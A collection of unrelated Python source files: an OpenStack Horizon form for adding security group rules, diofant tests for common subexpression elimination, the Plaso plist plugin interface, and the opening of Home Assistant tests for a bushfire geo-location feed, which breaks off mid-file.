for k in rules_dict
if rules_dict[k].get('backend', backend) == backend]
common_rules.sort()
custom_rules = [('tcp', _('Custom TCP Rule')),
('udp', _('Custom UDP Rule')),
('icmp', _('Custom ICMP Rule'))]
if backend == 'neutron':
custom_rules.append(('custom', _('Other Protocol')))
self.fields['rule_menu'].choices = custom_rules + common_rules
self.rules = rules_dict
if backend == 'neutron':
self.fields['direction'].choices = [('ingress', _('Ingress')),
('egress', _('Egress'))]
else:
# direction and ethertype are not supported in Nova secgroup.
self.fields['direction'].widget = forms.HiddenInput()
self.fields['ethertype'].widget = forms.HiddenInput()
# The ip_protocol field is used to specify an arbitrary protocol number
# and it is available only for the neutron security group backend.
self.fields['ip_protocol'].widget = forms.HiddenInput()
def clean(self):
cleaned_data = super(AddRule, self).clean()
rule_menu = cleaned_data.get('rule_menu')
port_or_range = cleaned_data.get("port_or_range")
remote = cleaned_data.get("remote")
icmp_type = cleaned_data.get("icmp_type", None)
icmp_code = cleaned_data.get("icmp_code", None)
from_port = cleaned_data.get("from_port", None)
to_port = cleaned_data.get("to_port", None)
port = cleaned_data.get("port", None)
if rule_menu == 'icmp':
cleaned_data['ip_protocol'] = rule_menu
if icmp_type is None:
msg = _('The ICMP type is invalid.')
raise ValidationError(msg)
if icmp_code is None:
msg = _('The ICMP code is invalid.')
raise ValidationError(msg)
if icmp_type not in xrange(-1, 256):
msg = _('The ICMP type is not in the range (-1, 255).')
raise ValidationError(msg)
if icmp_code not in xrange(-1, 256):
msg = _('The ICMP code is not in the range (-1, 255).')
raise ValidationError(msg)
cleaned_data['from_port'] = icmp_type
cleaned_data['to_port'] = icmp_code
elif rule_menu == 'tcp' or rule_menu == 'udp':
cleaned_data['ip_protocol'] = rule_menu
if port_or_range == "port":
cleaned_data["from_port"] = port
cleaned_data["to_port"] = port
if port is None:
msg = _('The specified port is invalid.')
raise ValidationError(msg)
else:
if from_port is None:
msg = _('The "from" port number is invalid.')
raise ValidationError(msg)
if to_port is None:
msg = _('The "to" port number is invalid.')
raise ValidationError(msg)
if to_port < from_port:
msg = _('The "to" port number must be greater than '
'or equal to the "from" port number.')
raise ValidationError(msg)
elif rule_menu == 'custom':
pass
else:
cleaned_data['ip_protocol'] = self.rules[rule_menu]['ip_protocol']
cleaned_data['from_port'] = int(self.rules[rule_menu]['from_port'])
cleaned_data['to_port'] = int(self.rules[rule_menu]['to_port'])
cleaned_data['direction'] = self.rules[rule_menu].get('direction')
# NOTE(amotoki): There are two cases where cleaned_data['direction']
# is empty: (1) Nova Security Group is used. Since "direction" is
# HiddenInput, direction field exists but its value is ''.
# (2) Template is used. In this case, the default value is None.
# To make sure 'direction' field has 'ingress' or 'egress',
# fill this field here if it is not specified.
if not cleaned_data['direction']:
cleaned_data['direction'] = 'ingress'
if remote == "cidr":
cleaned_data['security_group'] = None
else:
cleaned_data['cidr'] = None
# If cleaned_data does not contain cidr, cidr is already marked
# as invalid, so skip further validation for cidr.
# In addition, cleaned_data['cidr'] being None means a source group is used.
if 'cidr' in cleaned_data and cleaned_data['cidr'] is not None:
cidr = cleaned_data['cidr']
if not cidr:
msg = _('CIDR must be specified.')
self._errors['cidr'] = self.error_class([msg])
else:
# If cidr is specified, ethertype is determined from IP address
# version. It is used only when Neutron is enabled.
ip_ver = netaddr.IPNetwork(cidr).version
cleaned_data['ethertype'] = 'IPv6' if ip_ver == 6 else 'IPv4'
return cleaned_data
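# A worked example (values are illustrative): for an ICMP echo-request rule,
# icmp_type=8 and icmp_code=0 are remapped above into the shared port
# columns, so cleaned_data ends up with ip_protocol='icmp', from_port=8
# and to_port=0.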
def handle(self, request, data):
try:
rule = api.network.security_group_rule_create(
request,
filters.get_int_or_uuid(data['id']),
data['direction'],
data['ethertype'],
data['ip_protocol'],
data['from_port'],
data['to_port'],
data['cidr'],
data['security_group'])
messages.success(request,
_('Successfully added rule: %s') % unicode(rule))
return rule
except Exception:
redirect = reverse("horizon:project:access_and_security:"
"security_groups:detail", args=[data['id']])
exceptions.handle(request,
_('Unable to add rule to security group.'),
redirect=redirect)
| |
import itertools
import pytest
from diofant import (Add, Eq, Function, Idx, ImmutableDenseMatrix,
ImmutableSparseMatrix, IndexedBase, Matrix, MatrixSymbol,
MutableDenseMatrix, MutableSparseMatrix, O, Piecewise,
Pow, Rational, RootOf, Subs, Symbol, Tuple, cos, cse, exp,
meijerg, sin, sqrt, symbols, sympify, true)
from diofant.abc import a, b, w, x, y, z
from diofant.simplify import cse_main, cse_opts
from diofant.simplify.cse_opts import sub_post, sub_pre
__all__ = ()
x0, x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11, x12 = symbols('x:13')
def test_numbered_symbols():
ns = cse_main.numbered_symbols(prefix='y')
assert list(itertools.islice(
ns, 0, 10)) == [Symbol(f'y{i}') for i in range(10)]
ns = cse_main.numbered_symbols(prefix='y')
assert list(itertools.islice(
ns, 10, 20)) == [Symbol(f'y{i}') for i in range(10, 20)]
ns = cse_main.numbered_symbols()
assert list(itertools.islice(
ns, 0, 10)) == [Symbol(f'x{i}') for i in range(10)]
# Dummy "optimization" functions for testing.
def opt1(expr):
return expr + y
def opt2(expr):
return expr*z
def test_preprocess_for_cse():
assert cse_main.preprocess_for_cse(x, [(opt1, None)]) == x + y
assert cse_main.preprocess_for_cse(x, [(None, opt1)]) == x
assert cse_main.preprocess_for_cse(x, [(None, None)]) == x
assert cse_main.preprocess_for_cse(x, [(opt1, opt2)]) == x + y
assert cse_main.preprocess_for_cse(
x, [(opt1, None), (opt2, None)]) == (x + y)*z
def test_postprocess_for_cse():
assert cse_main.postprocess_for_cse(x, [(opt1, None)]) == x
assert cse_main.postprocess_for_cse(x, [(None, opt1)]) == x + y
assert cse_main.postprocess_for_cse(x, [(None, None)]) == x
assert cse_main.postprocess_for_cse(x, [(opt1, opt2)]) == x*z
# Note the reverse order of application.
assert cse_main.postprocess_for_cse(
x, [(None, opt1), (None, opt2)]) == x*z + y
def test_cse_single():
# Simple substitution.
e = Add(Pow(x + y, 2), sqrt(x + y))
substs, reduced = cse([e])
assert substs == [(x0, x + y)]
assert reduced == [sqrt(x0) + x0**2]
assert cse([e], order='none') == cse([e])
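# A small round-trip sanity check (an illustrative helper, not part of the
# original suite): back-substituting the replacement pairs in reverse order
# must reproduce the original expressions.
def _assert_cse_roundtrip(exprs):
    substs, reduced = cse(exprs)
    assert [r.subs(list(reversed(substs))) for r in reduced] == list(exprs)
def test_cse_roundtrip_sketch():
    _assert_cse_roundtrip([Add(Pow(x + y, 2), sqrt(x + y)), x + y + z])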
def test_cse_single2():
# Simple substitution, test for being able to pass the expression directly
e = Add(Pow(x + y, 2), sqrt(x + y))
substs, reduced = cse(e)
assert substs == [(x0, x + y)]
assert reduced == [sqrt(x0) + x0**2]
substs, reduced = cse(Matrix([[1]]))
assert isinstance(reduced[0], Matrix)
def test_cse_not_possible():
# No substitution possible.
e = Add(x, y)
substs, reduced = cse([e])
assert not substs
assert reduced == [x + y]
# issue sympy/sympy#6329
eq = (meijerg((1, 2), (y, 4), (5,), [], x) +
meijerg((1, 3), (y, 4), (5,), [], x))
assert cse(eq) == ([], [eq])
def test_nested_substitution():
# Substitution within a substitution.
e = Add(Pow(w*x + y, 2), sqrt(w*x + y))
substs, reduced = cse([e])
assert substs == [(x0, w*x + y)]
assert reduced == [sqrt(x0) + x0**2]
def test_subtraction_opt():
# Make sure subtraction is optimized.
e = (x - y)*(z - y) + exp((x - y)*(z - y))
substs, reduced = cse(
[e], optimizations=[(cse_opts.sub_pre, cse_opts.sub_post)])
assert substs == [(x0, (x - y)*(y - z))]
assert reduced == [-x0 + exp(-x0)]
e = -(x - y)*(z - y) + exp(-(x - y)*(z - y))
substs, reduced = cse(
[e], optimizations=[(cse_opts.sub_pre, cse_opts.sub_post)])
assert substs == [(x0, (x - y)*(y - z))]
assert reduced == [x0 + exp(x0)]
# issue sympy/sympy#4077
n = -1 + 1/x
e = n/x/(-n)**2 - 1/n/x
assert cse(e, optimizations=[(cse_opts.sub_pre, cse_opts.sub_post)]) == \
([], [0])
def test_multiple_expressions():
e1 = (x + y)*z
e2 = (x + y)*w
substs, reduced = cse([e1, e2])
assert substs == [(x0, x + y)]
assert reduced == [x0*z, x0*w]
l = [w*x*y + z, w*y]
substs, reduced = cse(l)
rsubsts, _ = cse(reversed(l))
assert substs == rsubsts
assert reduced == [z + x*x0, x0]
l = [w*x*y, w*x*y + z, w*y]
substs, reduced = cse(l)
rsubsts, _ = cse(reversed(l))
assert substs == rsubsts
assert reduced == [x1, x1 + z, x0]
l = [(x - z)*(y - z), x - z, y - z]
substs, reduced = cse(l)
rsubsts, _ = cse(reversed(l))
assert substs == [(x0, -z), (x1, x + x0), (x2, x0 + y)]
assert rsubsts == [(x0, -z), (x1, x0 + y), (x2, x + x0)]
assert reduced == [x1*x2, x1, x2]
l = [w*y + w + x + y + z, w*x*y]
assert cse(l) == ([(x0, w*y)], [w + x + x0 + y + z, x*x0])
assert cse([x + y, x + y + z]) == ([(x0, x + y)], [x0, z + x0])
assert cse([x + y, x + z]) == ([], [x + y, x + z])
assert cse([x*y, z + x*y, x*y*z + 3]) == \
([(x0, x*y)], [x0, z + x0, 3 + x0*z])
def test_non_commutative_cse():
A, B, C = symbols('A B C', commutative=False)
l = [A*B*C, A*C]
assert cse(l) == ([], l)
@pytest.mark.xfail
def test_non_commutative_cse_mul():
x0 = symbols('x0', commutative=False)
A, B, C = symbols('A B C', commutative=False)
l = [A*B*C, A*B]
assert cse(l) == ([(x0, A*B)], [x0*C, x0])
# Test if CSE of non-commutative Mul terms is disabled
def test_bypass_non_commutatives():
A, B, C = symbols('A B C', commutative=False)
l = [A*B*C, A*C]
assert cse(l) == ([], l)
l = [A*B*C, A*B]
assert cse(l) == ([], l)
l = [B*C, A*B*C]
assert cse(l) == ([], l)
def test_non_commutative_order():
A, B, C = symbols('A B C', commutative=False)
x0 = symbols('x0', commutative=False)
l = [B+C, A*(B+C)]
assert cse(l) == ([(x0, B+C)], [x0, A*x0])
l = [(A - B)**2 + A - B]
assert cse(l) == ([(x0, A - B)], [x0**2 + x0])
@pytest.mark.xfail
def test_powers():
assert cse(x*y**2 + x*y) == ([(x0, x*y)], [x0*y + x0])
def test_basic_optimization():
# issue sympy/sympy#4498
assert cse(w/(x - y) + z/(y - x), optimizations='basic') == \
([], [(w - z)/(x - y)])
def test_sympyissue_4020():
assert cse(x**5 + x**4 + x**3 + x**2, optimizations='basic') \
== ([(x0, x**2)], [x0*(x**3 + x + x0 + 1)])
def test_sympyissue_4203():
assert cse(sin(x**x)/x**x) == ([(x0, x**x)], [sin(x0)/x0])
def test_sympyissue_6263():
e = Eq(x*(-x + 1) + x*(x - 1), 0)
assert cse(e, optimizations='basic') == ([], [True])
def test_dont_cse_tuples():
f = Function('f')
g = Function('g')
name_val, (expr,) = cse(Subs(f(x, y), (x, 0), (y, 1)) +
Subs(g(x, y), (x, 0), (y, 1)))
assert not name_val
assert expr == (Subs(f(x, y), (x, 0), (y, 1))
+ Subs(g(x, y), (x, 0), (y, 1)))
name_val, (expr,) = cse(Subs(f(x, y), (x, 0), (y, x + y)) +
Subs(g(x, y), (x, 0), (y, x + y)))
assert name_val == [(x0, x + y)]
assert expr == Subs(f(x, y), (x, 0), (y, x0)) + Subs(g(x, y), (x, 0), (y, x0))
def test_pow_invpow():
assert cse(1/x**2 + x**2) == \
([(x0, x**2)], [x0 + 1/x0])
assert cse(x**2 + (1 + 1/x**2)/x**2) == \
([(x0, x**2), (x1, 1/x0)], [x0 + x1*(x1 + 1)])
assert cse(1/x**2 + (1 + 1/x**2)*x**2) == \
([(x0, x**2), (x1, 1/x0)], [x0*(x1 + 1) + x1])
assert cse(cos(1/x**2) + sin(1/x**2)) == \
([(x0, x**(-2))], [sin(x0) + cos(x0)])
assert cse(cos(x**2) + sin(x**2)) == \
([(x0, x**2)], [sin(x0) + cos(x0)])
assert cse(y/(2 + x**2) + z/x**2/y) == \
([(x0, x**2)], [y/(x0 + 2) + z/(x0*y)])
assert cse(exp(x**2) + x**2*cos(1/x**2)) == \
([(x0, x**2)], [x0*cos(1/x0) + exp(x0)])
assert cse((1 + 1/x**2)/x**2) == \
([(x0, x**(-2))], [x0*(x0 + 1)])
assert cse(x**(2*y) + x**(-2*y)) == \
([(x0, x**(2*y))], [x0 + 1/x0])
def test_postprocess():
eq = (x + 1 + exp((x + 1)/(y + 1)) + cos(y + 1))
assert cse([eq, Eq(x, z + 1), z - 2, (z + 1)*(x + 1)],
postprocess=cse_main.cse_separate) == \
[[(x1, y + 1), (x2, z + 1), (x, x2), (x0, x + 1)],
[x0 + exp(x0/x1) + cos(x1), z - 2, x0*x2]]
def test_sympyissue_4499():
# previously, this gave 16 constants
B = Function('B')
G = Function('G')
t = Tuple(*
(a, a + Rational(1, 2), 2*a, b, 2*a - b + 1, (sqrt(z)/2)**(-2*a + 1)*B(2*a -
b, sqrt(z))*B(b - 1, sqrt(z))*G(b)*G(2*a - b + 1),
sqrt(z)*(sqrt(z)/2)**(-2*a + 1)*B(b, sqrt(z))*B(2*a - b,
sqrt(z))*G(b)*G(2*a - b + 1), sqrt(z)*(sqrt(z)/2)**(-2*a + 1)*B(b - 1,
sqrt(z))*B(2*a - b + 1, sqrt(z))*G(b)*G(2*a - b + 1),
(sqrt(z)/2)**(-2*a + 1)*B(b, sqrt(z))*B(2*a - b + 1,
sqrt(z))*G(b)*G(2*a - b + 1), 1, 0, Rational(1, 2), z/2, -b + 1, -2*a + b,
-2*a))
c = cse(t)
ans = (
[(x0, 2*a), (x1, -b), (x2, x1 + 1), (x3, x0 + x2), (x4, sqrt(z)), (x5,
B(x0 + x1, x4)), (x6, G(b)), (x7, G(x3)), (x8, -x0), (x9,
(x4/2)**(x8 + 1)), (x10, x6*x7*x9*B(b - 1, x4)), (x11, x6*x7*x9*B(b,
x4)), (x12, B(x3, x4))], [(a, a + Rational(1, 2), x0, b, x3, x10*x5,
x11*x4*x5, x10*x12*x4, x11*x12, 1, 0, Rational(1, 2), z/2, x2, b + x8, x8)])
assert ans == c
def test_sympyissue_6169():
r = RootOf(x**6 - 4*x**5 - 2, 1)
assert cse(r) == ([], [r])
# and a check that the right thing is done with the new
# mechanism
assert sub_post(sub_pre((-x - y)*z - x - y)) == -z*(x + y) - x - y
def test_cse_Indexed():
len_y = 5
y = IndexedBase('y', shape=(len_y,))
x = IndexedBase('x', shape=(len_y,))
i = Idx('i', len_y-1)
expr1 = (y[i+1]-y[i])/(x[i+1]-x[i])
expr2 = 1/(x[i+1]-x[i])
replacements, _ = cse([expr1, expr2])
assert len(replacements) > 0
@pytest.mark.xfail
def test_cse_MatrixSymbol():
A = MatrixSymbol('A', 3, 3)
y = MatrixSymbol('y', 3, 1)
expr1 = (A.T*A).inverse() * A * y
expr2 = (A.T*A) * A * y
replacements, _ = cse([expr1, expr2])
assert len(replacements) > 0
def test_Piecewise():
f = Piecewise((-z + x*y, Eq(y, 0)), (-z - x*y, True))
ans = cse(f)
actual_ans = ([(x0, -z), (x1, x*y)], [Piecewise((x0+x1, Eq(y, 0)), (x0 - x1, True))])
assert ans == actual_ans
def test_ignore_order_terms():
eq = exp(x).series(x, 0, 3) + sin(y + x**3) - 1
assert cse(eq) == ([], [sin(x**3 + y) + x + x**2/2 + O(x**3)])
def test_name_conflict():
z1 = x0 + y
z2 = x2 + x3
l = [cos(z1) + z1, cos(z2) + z2, x0 + x2]
substs, reduced = cse(l)
assert [e.subs(reversed(substs)) for e in reduced] == l
def test_name_conflict_cust_symbols():
z1 = x0 + y
z2 = x2 + x3
l = [cos(z1) + z1, cos(z2) + z2, x0 + x2]
substs, reduced = cse(l, symbols('x:10'))
assert [e.subs(reversed(substs)) for e in reduced] == l
def test_symbols_exhausted_error():
l = cos(x+y)+x+y+cos(w+y)+sin(w+y)
sym = [x, y, z]
with pytest.raises(ValueError):
cse(l, symbols=sym)
def test_sympyissue_7840():
# daveknippers' example
C393 = sympify(
'Piecewise((C391 - 1.65, C390 < 0.5), (Piecewise((C391 - 1.65, \
C391 > 2.35), (C392, True)), True))'
)
C391 = sympify(
'Piecewise((2.05*C390**(-1.03), C390 < 0.5), (2.5*C390**(-0.625), True))'
)
C393 = C393.subs({'C391': C391})
# simple substitution
sub = {}
sub['C390'] = 0.703451854
sub['C392'] = 1.01417794
ss_answer = C393.subs(sub)
# cse
substitutions, new_eqn = cse(C393)
for pair in substitutions:
sub[pair[0].name] = pair[1].subs(sub)
cse_answer = new_eqn[0].subs(sub)
# both methods should be the same
assert ss_answer == cse_answer
# GitRay's example
expr = Piecewise((Symbol('ON'), Eq(Symbol('mode'), Symbol('ON'))),
(Piecewise((Piecewise((Symbol('OFF'), Symbol('x') < Symbol('threshold')),
(Symbol('ON'), true)), Eq(Symbol('mode'), Symbol('AUTO'))),
(Symbol('OFF'), true)), true))
substitutions, new_eqn = cse(expr)
# this Piecewise should be exactly the same
assert new_eqn[0] == expr
# there should not be any replacements
assert len(substitutions) < 1
def test_matrices():
# issue sympy/sympy#8891
for cls in (MutableDenseMatrix, MutableSparseMatrix,
ImmutableDenseMatrix, ImmutableSparseMatrix):
m = cls(2, 2, [x + y, 0, 0, 0])
res = cse([x + y, m])
ans = ([(x0, x + y)], [x0, cls([[x0, 0], [0, 0]])])
assert res == ans
assert isinstance(res[1][-1], cls)
def test_cse_ignore():
exprs = [exp(y)*(3*y + 3*sqrt(x+1)), exp(y)*(5*y + 5*sqrt(x+1))]
subst1, _ = cse(exprs)
assert any(y in sub.free_symbols for _, sub in subst1), 'cse failed to identify any term with y'
subst2, _ = cse(exprs, ignore=(y,)) # y is not allowed in substitutions
assert not any(y in sub.free_symbols for _, sub in subst2), 'Sub-expressions containing y must be ignored'
assert any(sub - sqrt(x + 1) == 0 for _, sub in subst2), 'cse failed to identify sqrt(x + 1) as sub-expression'
| |
# -*- coding: utf-8 -*-
"""Plist_interface contains basic interface for plist plugins within Plaso.
Plist files are only one example of a type of object that the Plaso tool is
expected to encounter and process. There can be and are many other parsers
which are designed to process specific data types.
PlistPlugin defines the attributes necessary for registration, discovery
and operation of plugins for plist files which will be used by PlistParser.
"""
import abc
import logging
from plaso.lib import errors
from plaso.parsers import plugins
class PlistPlugin(plugins.BasePlugin):
"""This is an abstract class from which plugins should be based.
The following are the attributes and methods expected to be overridden by a
plugin.
Attributes:
PLIST_PATH - string of the filename the plugin is designed to process.
PLIST_KEY - list of keys holding values that are necessary for processing.
Please note, PLIST_KEY is case sensitive; for a plugin to match, the
plist file needs to contain at minimum the keys needed for
processing, or WrongPlistPlugin is raised.
For example, if a plist file contains the keys
{'foo': 1, 'bar': 2, 'opt': 3}, with 'foo' and 'bar' being critical to
processing, define PLIST_KEY as ['foo', 'bar']. If 'opt' is only optionally
defined, it can still be accessed by manually processing self.top_level from
the plugin.
Methods:
GetEntries() - extracts and formats info from keys and yields event.PlistEvent.
"""
NAME = u'plist_plugin'
# PLIST_PATH is a string for the filename this parser is designed to process.
# This is expected to be overridden by the processing plugin.
# Ex. 'com.apple.bluetooth.plist'
PLIST_PATH = u'any'
# PLIST_KEYS is a list of keys required by a plugin.
# This is expected to be overridden by the processing plugin.
# Ex. frozenset(['DeviceCache', 'PairedDevices'])
PLIST_KEYS = frozenset([u'any'])
# This is expected to be overridden by the processing plugin.
# URLS should contain a list of URLs with additional information about
# this key or value.
# Ex. ['http://www.forensicswiki.org/wiki/Property_list_(plist)']
URLS = []
def _GetKeys(self, top_level, keys, depth=1):
"""Helper function to return keys nested in a plist dict.
By default this function returns the values for the named keys requested
by a plugin in a match dictionary object. The default setting is to look
a single layer down from the root (the same level as the check for plugin
applicability), which is suitable for most cases.
For cases where there is variability in the name at the first level
(e.g. it is the MAC addresses of a device, or a UUID) it is possible to
override the depth limit and use GetKeys to fetch from a deeper level.
E.g.
Top_Level (root): # depth = 0
-- Key_Name_is_UUID_Generated_At_Install 1234-5678-8 # depth = 1
---- Interesting_SubKey_with_value_to_Process: [Values, ...] # depth = 2
Args:
top_level: Plist in dictionary form.
keys: A list of keys that should be returned.
depth: Defines how many levels deep to check for a match.
Returns:
A dictionary with just the keys requested or an empty dict if the plist
is flat, e.g. top_level is a list instead of a dict object.
"""
match = {}
if not isinstance(top_level, dict):
# Return an empty dict here if top_level is a list object, which happens
# if the plist file is flat.
return match
keys = set(keys)
if depth == 1:
for key in keys:
match[key] = top_level.get(key, None)
else:
for _, parsed_key, parsed_value in RecurseKey(top_level, depth=depth):
if parsed_key in keys:
match[parsed_key] = parsed_value
if set(match.keys()) == keys:
return match
return match
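# Illustrative sketch (hypothetical plist data): with depth=2 the helper can
# reach below a variable first-level key such as a generated UUID:
#   top_level = {u'1234-5678-8': {u'Interesting_SubKey': [u'Value']}}
#   self._GetKeys(top_level, [u'Interesting_SubKey'], depth=2)
#   # -> {u'Interesting_SubKey': [u'Value']}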
@abc.abstractmethod
def GetEntries(
self, parser_mediator, top_level=None, match=None, **unused_kwargs):
"""Extracts event objects from the values of entries within a plist.
This is the main method that a plist plugin needs to implement.
The contents of the plist keys defined in PLIST_KEYS will be made available
to the plugin as self.matched{'KEY': 'value'}. The plugin should implement
logic to parse this into a useful event for incorporation into the Plaso
timeline.
For example, if you want to note the timestamps of when devices were
LastInquiryUpdated, you would need to examine the bluetooth config file
called 'com.apple.bluetooth' and look at devices under the key
'DeviceCache'. To do this the plugin needs to define
PLIST_PATH = 'com.apple.bluetooth' and PLIST_KEYS =
frozenset(['DeviceCache']). IMPORTANT: this interface requires exact names
and is case sensitive. A unit test based on a real world file is expected
for each plist plugin.
When a file with this key is encountered during processing, self.matched is
populated and the plugin's GetEntries() is called. The plugin would have
self.matched = {'DeviceCache': [{'DE:AD:BE:EF:01': {'LastInquiryUpdate':
DateTime_Object}, 'DE:AD:BE:EF:02': {'LastInquiryUpdate':
DateTime_Object}, ...}]} and needs to implement logic here to extract
values, format, and produce the data as an event.PlistEvent.
The attributes for a PlistEvent should include the following:
root = Root key this event was extracted from. E.g. DeviceCache/
key = Key the value resided in. E.g. 'DE:AD:BE:EF:01'
time = Time this artifact was created, in microseconds (usec)
since January 1, 1970, 00:00:00 UTC.
desc = Short description. E.g. 'Device LastInquiryUpdated'
See plist/bluetooth.py for the implemented example plugin.
Args:
parser_mediator: A parser mediator object (instance of ParserMediator).
top_level: Optional plist in dictionary form. The default is None.
match: Optional dictionary containing extracted keys from PLIST_KEYS.
The default is None.
"""
# pylint: disable=arguments-differ
def Process(self, parser_mediator, plist_name, top_level, **kwargs):
"""Determine if this is the correct plugin; if so proceed with processing.
Process() checks if the current plist being processed is a match for a
plugin by comparing the PATH and KEY requirements defined by the plugin. If
both match, processing continues; otherwise WrongPlistPlugin is raised.
This function also extracts the required keys as defined in self.PLIST_KEYS
from the plist and stores the result in self.match[key] and calls
self.GetEntries() which holds the processing logic implemented by the
plugin.
Args:
parser_mediator: A parser mediator object (instance of ParserMediator).
plist_name: Name of the plist file.
top_level: Plist in dictionary form.
Raises:
WrongPlistPlugin: If this plugin is not able to process the given file.
ValueError: If top_level or plist_name are not set.
"""
if plist_name is None or top_level is None:
raise ValueError(u'Top level or plist name is not set.')
if plist_name.lower() != self.PLIST_PATH.lower():
raise errors.WrongPlistPlugin(self.NAME, plist_name)
if isinstance(top_level, dict):
if not set(top_level.keys()).issuperset(self.PLIST_KEYS):
raise errors.WrongPlistPlugin(self.NAME, plist_name)
else:
# Make sure we are getting back an object that has an iterator.
if not hasattr(top_level, u'__iter__'):
raise errors.WrongPlistPlugin(self.NAME, plist_name)
# This is a list and we need to just look at the first level
# of keys there.
keys = []
for top_level_entry in top_level:
if isinstance(top_level_entry, dict):
keys.extend(top_level_entry.keys())
# Compare this as a set, which removes possible duplicate entries
# in the list.
if not set(keys).issuperset(self.PLIST_KEYS):
raise errors.WrongPlistPlugin(self.NAME, plist_name)
# This will raise if unhandled keyword arguments are passed.
super(PlistPlugin, self).Process(parser_mediator)
logging.debug(u'Plist Plugin Used: {0:s} for: {1:s}'.format(
self.NAME, plist_name))
match = self._GetKeys(top_level, self.PLIST_KEYS)
self.GetEntries(parser_mediator, top_level=top_level, match=match)
# TODO: move to lib.plist.
def RecurseKey(recur_item, depth=15, key_path=u''):
"""Flattens nested dictionaries and lists by yielding it's values.
The hierarchy of a plist file is a series of nested dictionaries and lists.
This helper function helps plugins navigate the structure without
having to implement their own recursive methods.
This method implements an overridable depth limit to prevent processing
extremely deeply nested plists. If the limit is reached a debug message is
logged indicating which key processing stopped on.
Example Input Plist:
recur_item = { DeviceRoot: { DeviceMAC1: [Value1, Value2, Value3],
DeviceMAC2: [Value1, Value2, Value3]}}
Example Output:
('', DeviceRoot, {DeviceMACs...})
(DeviceRoot, DeviceMAC1, [Value1, Value2, Value3])
(DeviceRoot, DeviceMAC2, [Value1, Value2, Value3])
Args:
recur_item: An object to be checked for additional nested items.
depth: Optional integer indicating the current recursion depth.
This value is used to ensure we stop at the maximum recursion depth.
The default is 15.
key_path: Optional path of the current working key. The default is
an empty string.
Yields:
A tuple of the key path, key, and value from a plist.
"""
if depth < 1:
logging.debug(u'Recursion limit hit for key: {0:s}'.format(key_path))
return
if isinstance(recur_item, (list, tuple)):
for recur in recur_item:
for key in RecurseKey(recur, depth=depth, key_path=key_path):
yield key
return
if not hasattr(recur_item, u'iteritems'):
return
# TODO determine if recur_item is a plistlib._InternalDict to determine
# if recur_item.iteritems() should be replaced with iter(recur_item.items()).
# Note that testing breaks when explicitly only allowing
# plistlib._InternalDict.
for subkey, value in recur_item.iteritems():
yield key_path, subkey, value
if isinstance(value, dict):
value = [value]
if isinstance(value, list):
for item in value:
if not isinstance(item, dict):
continue
subkey_path = u'{0:s}/{1:s}'.format(key_path, subkey)
for tuple_value in RecurseKey(
item, depth=depth - 1, key_path=subkey_path):
yield tuple_value
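# A minimal concrete plugin sketch (hypothetical names, for illustration
# only): match 'com.example.app.plist' files that contain a 'LastRun' key.
#
#   class ExamplePlistPlugin(PlistPlugin):
#     NAME = u'example_plist'
#     PLIST_PATH = u'com.example.app.plist'
#     PLIST_KEYS = frozenset([u'LastRun'])
#     def GetEntries(self, parser_mediator, match=None, **unused_kwargs):
#       # Turn match[u'LastRun'] into event objects here.
#       pass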
| |
"""The tests for the geojson platform."""
import datetime
from asynctest.mock import patch, MagicMock, call
from homeassistant.components import geo_location
from homeassistant.components.geo_location import ATTR_SOURCE
from homeassistant.components.nsw_rural_fire_service_feed.geo_location import (
ATTR_EXTERNAL_ID,
SCAN_INTERVAL,
ATTR_CATEGORY,
ATTR_FIRE,
ATTR_LOCATION,
ATTR_COUNCIL_AREA,
ATTR_STATUS,
ATTR_TYPE,
ATTR_SIZE,
ATTR_RESPONSIBLE_AGENCY,
ATTR_PUBLICATION_DATE,
)
from homeassistant.const import (
ATTR_ATTRIBUTION,
ATTR_FRIENDLY_NAME,
ATTR_LATITUDE,
ATTR_LONGITUDE,
ATTR_UNIT_OF_MEASUREMENT,
CONF_LATITUDE,
CONF_LONGITUDE,
CONF_RADIUS,
EVENT_HOMEASSISTANT_START,
ATTR_ICON,
)
from homeassistant.setup import async_setup_component
from tests.common import assert_setup_component, async_fire_time_changed
import homeassistant.util.dt as dt_util
CONFIG = {
geo_location.DOMAIN: [{"platform": "nsw_rural_fire_service_feed", CONF_RADIUS: 200}]
}
CONFIG_WITH_CUSTOM_LOCATION = {
geo_location.DOMAIN: [
{
"platform": "nsw_rural_fire_service_feed",
CONF_RADIUS: 200,
CONF_LATITUDE: 15.1,
CONF_LONGITUDE: 25.2,
}
]
}
def _generate_mock_feed_entry(
external_id,
title,
distance_to_home,
coordinates,
category=None,
location=None,
attribution=None,
publication_date=None,
council_area=None,
status=None,
entry_type=None,
fire=True,
size=None,
responsible_agency=None,
):
"""Construct a mock feed entry for testing purposes."""
feed_entry = MagicMock()
feed_entry.external_id = external_id
feed_entry.title = title
feed_entry.distance_to_home = distance_to_home
feed_entry.coordinates = coordinates
feed_entry.category = category
feed_entry.location = location
feed_entry.attribution = attribution
feed_entry.publication_date = publication_date
feed_entry.council_area = council_area
feed_entry.status = status
feed_entry.type = entry_type
feed_entry.fire = fire
feed_entry.size = size
feed_entry.responsible_agency = responsible_agency
return feed_entry
async def test_setup(hass):
"""Test the general setup of the platform."""
# Set up some mock feed entries for this test.
mock_entry_1 = _generate_mock_feed_entry(
"1234",
"Title 1",
15.5,
(-31.0, 150.0),
category="Category 1",
location="Location 1",
attribution="Attribution 1",
publication_date=datetime.datetime(
2018, 9, 22, 8, 0, tzinfo=datetime.timezone.utc
),
council_area="Council Area 1",
status="Status 1",
entry_type="Type 1",
size="Size 1",
responsible_agency="Agency 1",
)
mock_entry_2 = _generate_mock_feed_entry(
"2345", "Title 2", 20.5, (-31.1, 150.1), fire=False
)
mock_entry_3 = _generate_mock_feed_entry("3456", "Title 3", 25.5, (-31.2, 150.2))
mock_entry_4 = _generate_mock_feed_entry("4567", "Title 4", 12.5, (-31.3, 150.3))
utcnow = dt_util.utcnow()
# Patching 'utcnow' to gain more control over the timed update.
with patch("homeassistant.util.dt.utcnow", return_value=utcnow), patch(
"geojson_client.nsw_rural_fire_service_feed." "NswRuralFireServiceFeed"
) as mock_feed:
mock_feed.return_value.update.return_value = (
"OK",
[mock_entry_1, mock_entry_2, mock_entry_3],
)
with assert_setup_component(1, geo_location.DOMAIN):
assert await async_setup_component(hass, geo_location.DOMAIN, CONFIG)
# Artificially trigger update.
hass.bus.async_fire(EVENT_HOMEASSISTANT_START)
# Collect events.
await hass.async_block_till_done()
all_states = hass.states.async_all()
assert len(all_states) == 3
state = hass.states.get("geo_location.title_1")
assert state is not None
assert state.name == "Title 1"
assert state.attributes == {
ATTR_EXTERNAL_ID: "1234",
ATTR_LATITUDE: -31.0,
